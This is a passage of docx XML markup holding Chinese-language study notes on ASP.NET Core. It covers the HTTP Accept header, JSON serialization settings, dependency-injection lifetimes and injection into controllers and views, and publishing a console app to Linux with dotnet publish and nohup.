      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
        </w:rPr>
        <w:t>的Accept头指的就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
        </w:rPr>
        <w:t>协议中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的Accept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
        </w:rPr>
        <w:t>头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
        </w:rPr>
        <w:t>例如: accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="38"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/dotNETCoreSG/p/aspnetcore-4_2_3-model-formatting.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ASP.NET Core 中文文档 第四章 MVC（2.3）格式化响应数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON序列化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>当项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要采用前后端分离的方式就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>考虑到JSON格式的问题了，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ASP.NET Core已经</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为我们考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>好了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ConfigureService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>调用AddMvc().</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AddJsonOptions()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>就可以对JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>格式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进行配置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>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services.AddMvc().AddJsonOptions(options =&gt;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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>设置不使用驼峰格式处理，由后台字段确定大小写</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options.SerializerSettings.ContractResolver = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> DefaultContractResolver();</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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>不返回值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的属性</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options.SerializerSettings.NullValueHandling = NullValueHandling.Ignore;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>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tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖</w:t>
      </w:r>
      <w:r>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>核心</w:t>
      </w:r>
      <w:r>
        <w:t>组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>在.NET Core中DI的核心分为两个组件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IServiceCollection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IServiceProvider</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>IServiceCollection 负责注册</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>IServiceProvider 负责提供实例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>通过IServiceCollection注册进去有三个方法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AddSingleton</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AddTransient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AddScoped</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这三个方法只是生命周期不同：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Transient： 每一次GetService都会创建一个新的实例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Scoped：  在同一个Scope内只初始化一个实例 ，可以理解为（ 每一个request级别只创建一个实例，同一个http request会在一个 scope内）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Singleton ：整个应用程序生命周期以内只创建一个实例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>这有什么用？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果在Mvc中用过Autofac的InstancePerRequest的同学就知道，有一些对象在一个请求跨越多个Action或者多个Service、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Repository的时候，比如最常用的DBContext它可以是一个实例。即能减少实例初始化的消耗，还能实现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>跨Service事务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的功能。(注：在ASP.NET Core中所有用到EF的Service 都需要注册成Scoped )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>而实现这种功能的方法就是在整个reqeust请求的生命周期以内共用了一个Scope。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如何使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在Controller中使用依赖注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一般可以通过构造函数或者属性来实现注入，但是官方推荐是通过构造函数。这也是所谓的显式依赖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>首先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ConfigureServices方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>接口和实现类：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>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services.AddTransient(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(IFormula),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(MainFormula));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r>
        <w:t>中的构造函数中取出这个对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>就能使用它了</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IFormula _formula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HomeController(IFormula formula)</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_formula = formula;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>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tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r>
        <w:t>中需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用@inject声明</w:t>
      </w:r>
      <w:r>
        <w:t>一下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>@inject IFormula _formula</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;div&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>@_formula.ID&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/jesse2013/p/di-in-aspnetcore.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全面理解 ASP.NET Core 依赖注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制台程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布到Linux系统上有两种方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用dotnet命令发布</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">复制程序到目录中去，在当前目录打开终端输入dotnet publish </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">o 发布文件夹 </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c release，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>发布程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后进入到发布文件夹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>运行程序，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入dotnet dll文件，这里的文件对应windows系统的exe文件，但有一个问题就是不能够在后台运行，一旦关闭终端程序就终止了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>我们可以用nohup命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>nohup dotnet *.dll &amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
